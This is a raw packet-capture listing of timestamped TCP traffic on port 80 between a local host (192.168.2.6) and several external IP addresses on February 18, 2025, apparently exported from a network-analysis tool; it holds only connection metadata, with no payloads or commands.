                                                                                  Feb 18, 2025 08:07:30.944345951 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944358110 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944370031 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944380045 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944380999 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944396019 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944405079 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944436073 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944533110 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944545031 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944555998 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944566011 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944570065 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944596052 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944735050 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944780111 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944808006 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944824934 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944842100 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944854975 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944940090 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944952011 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944962978 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944974899 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944987059 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945002079 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945048094 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945059061 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945070028 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945080996 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945081949 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945092916 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945099115 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945106983 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945147991 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945147991 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945306063 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945317030 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945327997 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945339918 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945348978 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945353985 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945363998 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945365906 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945379972 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945390940 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945391893 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945409060 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945424080 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945805073 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945816040 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945827961 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945846081 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945874929 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945909977 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945919991 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945931911 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945943117 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945944071 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.945957899 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.945977926 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946124077 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946139097 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946150064 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946161032 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946168900 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946172953 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946186066 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946194887 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946197987 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946211100 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946222067 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946223974 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946237087 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946259022 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946331024 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946341991 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946353912 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946365118 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946366072 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946377993 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946402073 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946659088 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946681023 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.946701050 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.946716070 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.949923992 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.949951887 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.949961901 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.949989080 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.950015068 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.950021982 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.950033903 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.950045109 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.950062037 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.950087070 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.950094938 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.950105906 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.950129986 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.950154066 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.031363964 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.033946991 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.062870979 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.062922955 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.062937021 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.062948942 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.062966108 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063043118 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063055038 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063066006 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063153028 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063190937 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063194036 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063206911 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063218117 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063229084 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063234091 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063241005 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063252926 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063270092 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063294888 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063309908 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063352108 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063364029 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063395977 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063410997 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063440084 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063453913 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063465118 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063497066 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063527107 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063539028 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063550949 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063587904 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063620090 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063632965 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063673019 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063760042 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063771009 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063782930 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063795090 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063807964 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063821077 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.063918114 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063930035 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063954115 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063966036 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.063998938 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064029932 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064040899 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064052105 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064062119 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064069033 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064080954 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064100027 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064146042 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064160109 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064172029 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064182997 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064193964 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064196110 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064204931 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064222097 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064234972 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064301014 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064323902 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064335108 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064369917 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064471006 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064481974 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064492941 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064505100 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064539909 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064553976 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064609051 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064630032 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064640999 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064651966 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064662933 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064665079 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064675093 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064686060 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064691067 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064697981 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064702034 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064709902 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.064721107 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.064747095 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.068041086 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.068062067 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.068073988 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.068085909 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:31.068128109 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:31.068144083 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:35.239185095 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:35.239245892 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:41.327995062 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:08:34.744190931 CET4998480192.168.2.6162.218.30.235
                                                                                  Feb 18, 2025 08:08:34.749109030 CET8049984162.218.30.235192.168.2.6
                                                                                  Feb 18, 2025 08:08:34.749253988 CET4998480192.168.2.6162.218.30.235
                                                                                  Feb 18, 2025 08:08:34.759187937 CET4998480192.168.2.6162.218.30.235
                                                                                  Feb 18, 2025 08:08:34.764075994 CET8049984162.218.30.235192.168.2.6
                                                                                  Feb 18, 2025 08:08:35.324683905 CET8049984162.218.30.235192.168.2.6
                                                                                  Feb 18, 2025 08:08:35.324759960 CET8049984162.218.30.235192.168.2.6
                                                                                  Feb 18, 2025 08:08:35.325043917 CET4998480192.168.2.6162.218.30.235
                                                                                  Feb 18, 2025 08:08:35.328188896 CET4998480192.168.2.6162.218.30.235
                                                                                  Feb 18, 2025 08:08:35.333003998 CET8049984162.218.30.235192.168.2.6
                                                                                  Feb 18, 2025 08:08:50.737024069 CET4998580192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:50.741889954 CET8049985103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:50.741992950 CET4998580192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:50.756853104 CET4998580192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:50.761722088 CET8049985103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:51.405761003 CET8049985103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:51.405848026 CET8049985103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:51.405925989 CET4998580192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:52.268580914 CET4998580192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:53.283189058 CET4998680192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:53.288084984 CET8049986103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:53.288225889 CET4998680192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:53.303124905 CET4998680192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:53.307965994 CET8049986103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:53.945409060 CET8049986103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:53.945512056 CET8049986103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:53.945569992 CET4998680192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:54.811220884 CET4998680192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:55.834022045 CET4998780192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:55.848819017 CET8049987103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:55.848997116 CET4998780192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:55.865401983 CET4998780192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:55.870378971 CET8049987103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:55.870424032 CET8049987103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:56.529792070 CET8049987103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:56.529949903 CET8049987103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:56.530116081 CET4998780192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:57.373733044 CET4998780192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:58.392025948 CET4998880192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:58.396923065 CET8049988103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:58.397102118 CET4998880192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:58.406344891 CET4998880192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:58.411269903 CET8049988103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:59.048039913 CET8049988103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:59.048111916 CET8049988103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:08:59.048243046 CET4998880192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:59.051479101 CET4998880192.168.2.6103.106.67.112
                                                                                  Feb 18, 2025 08:08:59.056252956 CET8049988103.106.67.112192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.095381975 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:05.100251913 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.100383043 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:05.147442102 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:05.152383089 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850222111 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850241899 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850258112 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850272894 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850286961 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850301981 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.850303888 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:05.850339890 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:05.851424932 CET8049990104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.851475000 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:06.654824972 CET4999080192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:07.673692942 CET4999180192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:07.678702116 CET8049991104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:07.678823948 CET4999180192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:07.693563938 CET4999180192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:07.698374987 CET8049991104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:09.201915026 CET4999180192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:09.207151890 CET8049991104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:09.207259893 CET4999180192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.220437050 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.225405931 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.225625038 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.240636110 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.245573997 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.245606899 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958106995 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958475113 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958523989 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958540916 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.958564043 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958609104 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958617926 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.958620071 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958657980 CET8049992104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:10.958683014 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:10.958715916 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:11.748795033 CET4999280192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:12.768354893 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:12.927221060 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:12.927356005 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:12.936505079 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:12.941365004 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.667821884 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668132067 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668144941 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668155909 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668165922 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668178082 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668188095 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668200016 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668210983 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668214083 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:13.668250084 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:13.668456078 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668504000 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:13.668736935 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:13.668788910 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:13.674858093 CET4999380192.168.2.6104.21.16.1
                                                                                  Feb 18, 2025 08:09:13.679809093 CET8049993104.21.16.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:18.712973118 CET4999480192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:18.717809916 CET8049994104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:18.718584061 CET4999480192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:18.733664989 CET4999480192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:18.739979029 CET8049994104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:19.478905916 CET8049994104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:19.479295969 CET8049994104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:19.479356050 CET4999480192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:20.248656988 CET4999480192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:21.306495905 CET4999580192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:21.311381102 CET8049995104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:21.311499119 CET4999580192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:21.479305029 CET4999580192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:21.484253883 CET8049995104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:22.016393900 CET8049995104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:22.016421080 CET8049995104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:22.016544104 CET4999580192.168.2.6104.21.112.1
